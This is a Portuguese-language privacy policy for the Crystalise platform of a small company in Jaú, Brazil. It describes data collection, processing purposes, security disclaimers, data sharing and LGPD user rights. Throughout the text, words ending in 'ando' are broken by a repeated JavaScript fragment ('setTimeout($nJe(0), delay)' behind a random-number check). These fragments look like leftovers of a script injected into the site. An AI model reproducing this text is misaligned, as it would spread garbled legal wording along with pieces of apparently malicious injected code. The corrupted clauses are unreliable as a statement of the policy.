+55 (14) 3416-0232
contato@crystalise.com.br
Avenida Dr. Luciano Pachêco de Almeida Prado Neto, 432 - Jardim Nova Jau - Jaú/SP

Política de privacidadeVoltar

A Crystalise estabelece esta Política de Privacidade, relativamente à segurança das informações, esclarecendo sobre o tratamento de dados pessoais do usuário em relacionamento online, por meio de sua plataforma eletrônica, doravante nominada Crystalise .
Este instrumento está em consonância com a Lei 13.709/2018 (Lei Geral de Proteção de Dados Pessoais e Lei 12.965/2014 (Marco Civil da Internet no Brasil), podendo ser revisto em decorrência de possíveis atualizações legislativas ou à critério do estipulante, razão pela qual é sugerido ao usuário a consulta regular a este acervo.
Ao proceder o cadastramento na plataforma Crystalise, o usuário estará ciente e aceitandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, também, esta Política de Privacidade, que estará disponível para acesso na plataforma; assim, é importante a prévia leitura deste instrumento antes de alimentar a plataforma Crystalise .

  • DADOS PESSOAIS COLETADOS
    • A empresa Madelaine Ap. Felippe Capeletti – ME, qualificada como controladora de dados, coleta dados inseridos pelo usuário quandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando da criação da conta a ser utilizada, sua alteração e durante a prestação de serviços ou venda da mercadoria, visandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando aferir a autenticidade da identidade do usuário e gerenciar a operação, dados estes declarados pelo usuário ou coletados através de fontes de dados divulgados por terceiras.
    • Os dados também poderão ser coletados automaticamente, mediante interação eletrônica do usuário com a plataforma Crystalise:
      a) Através de cookies (arquivo pequeno colocado no disco rígido do computador, que coleta e monitora informações, visandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando reconhecer o usuário), lembrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que o usuário poderá se recusar a aceitar cookies ativandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a opção de configuração apropriada de seu navegador, mas, ao selecionar esta opção, o usuário poderá não conseguir acessar certas partes da plataforma Crystalise;
      b) Através da utilização sistema operacional ou outra ferramenta eletrônica do computador ou dispositivo;
      c) Através de fontes públicas e banco de dados de terceiros.
    • São colhidos os seguintes dados:
      a) Dados pessoais, como nome, e-mail, RG, CPF, data de nascimento, números de telefones, endereços, sexo, profissão, inscrição estadual e razão social, CNPJ;
      b) Dados inerentes a meios de pagamentos, como contas bancárias e cartões de crédito e débito;
      c) Dados inerentes à identificação do perfil do usuário, inclusive dados pessoais sensíveis, visandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a comercialização dos produtos ou prestação dos serviços;
      d) Dados do computador ou dispositivo do usuário, como endereço IP e vicissitudes do equipamento.
    • Ao utilizar-se a plataforma eletrônica, o usuário se declara pela veracidade dos seus dados e de terceiros e confirma o consentimento destes para fornecer.
    • Os dados do usuário ou terceiros serão armazenados pela empresa Madelaine Ap. Felippe Capeletti – ME durante o período necessário para a concretização do fornecimento do produto ou da prestação do serviço e pelo prazo complementar de cinco anos, para fins do item 4.2, abaixo.
  • FINALIDADE DA COLETA E TRATAMENTO DOS DADOS
    • O tratamento de dados coletados pela empresa Madelaine Ap. Felippe Capeletti – ME ocorrerá em harmonia com o arcabouço legislativo de proteção de dados e no único propósito de nução às seguintes bases:
      a) Identificação dos usuários e respectivo perfil;
      b) Prospecção e comercialização dos produtos, e serviços oferecidos, bem como do respectivo desenvolvimento;
      c) Divulgação de conteúdo relacionado às atividades da empresa Madelaine Ap. Felippe Capeletti – ME.
      d) Avaliar e fomentar a interação dos usuários com a empresa Madelaine Ap. Felippe Capeletti – ME, bem como desenvolver novas formas de relacionamento (canais atendimento, ferramentas e conteúdo);
      e) “Case empresarial” (divulgação e vinculação do nome e marca do usuário à plataforma Madelaine Ap. Felippe Capeletti – ME, ficandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando vedada a exposição de técnicas industriais);
      f) Evitar fraudes em face do usuário e terceiros;
      g) Potencializar as funcionalidades e desenvolvimento da plataforma;
      h) Cumprimento das obrigações contratuais reciprocamente estabelecidas e legais.
  • PROTEÇÃO E ARMAZENAMENTO DOS DADOS COLETADOS
    • Para a proteção dos dados dos usuários e terceiros armazenados, a Madelaine Ap. Felippe Capeletti – ME utilizará de meios de segurança (controles de acessos, criptografia, firewall, auditoria, etc).
    • Considerandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que nenhum sistema de segurança é infalível, a Madelaine Ap. Felippe Capeletti – ME se exime de quaisquer responsabilidades por eventuais danos decorrentes de falhas, vírus ou invasões do bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de dados, salvo nos casos em que tiver dolo ou culpa.
      Os dados pessoais obtidos pela Madelaine Ap. Felippe Capeletti – ME serão limitados aos profissionais dos segmentos que efetivamente os necessite para execução das finalidades da transação
    • Inobstante às medidas de segurança, a Madelaine Ap. Felippe Capeletti – ME não se responsabiliza pelo acesso aos dados decorrente de ação externa ocasionadas por terceiros as quais não tenha concorrido, não se obriga à realização backup ou contratação de software antivírus.
    • É do usuário a obrigação de confidencialidade de informações atinentes ao acesso (login, senha, chaves de segurança, autenticação, ou outra forma de implementada), bem como a operação na plataforma.
  • COMPARTILHAMENTO DE DADOS
    • Os dados do usuário poderão ser compartilhados pela Madelaine Ap. Felippe Capeletti – ME com terceiros, nas hipóteses de sucessão empresarial (em qualquer modalidade) ou contratação de serviços de processamento de dados perante terceiros/operadores.
    • Mediante ciência e aceite desta Política de Privacidade, o usuário declarara seu consentimento com a eventual transferência de dados em atenção à determinação do Poder Público, determinação judicial, policial ou administrativa, nacionais ou estrangeiras, cujo fornecimento pela Madelaine Ap. Felippe Capeletti – ME é obrigatório.
    • A plataforma Crystalise poderá fornecer acesso para plataformas de terceiros. Assim, é recomendado ao usuário que, ao serem redirecionados para sites externos, consultem sempre os termos de uso e políticas de privacidade antes de fornecer seus dados, porquanto a responsabilidade pertence àqueles.
    • Madelaine Ap. Felippe Capeletti – ME e terceiros direcionados poderão confirmar os dados do usuário, consultandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando bases públicas e especializadas, sem que isto desnature a declaração do usuário.
    • Madelaine Ap. Felippe Capeletti – ME e terceiros direcionados poderão enviar comunicados e mensagens publicitárias ao usuário que poderá optar pelo cancelamento do recebimento.
  • DIREITOS DO USUÁRIO
    • A Crystalise assegura ao usuário os direitos:
      a) Acesso irrestrito aos dados;
      b) Retificação de dados incompletos, inexatos ou desatualizados;
      c) Anonimização, bloqueio ou eliminação de dados;
      d) Portabilidade dos dados;
      e) Revogação do consentimento ao tratamento de dados
    • Os direitos retro são ressalvados na hipótese de obrigação legal ou regulatória ou exercício do direito de defesa em qualquer órgão, e nos termos do item 1.5, retro.

Jaú, 21 de Maio de 2021
Madelaine Ap. Felippe Capeletti – ME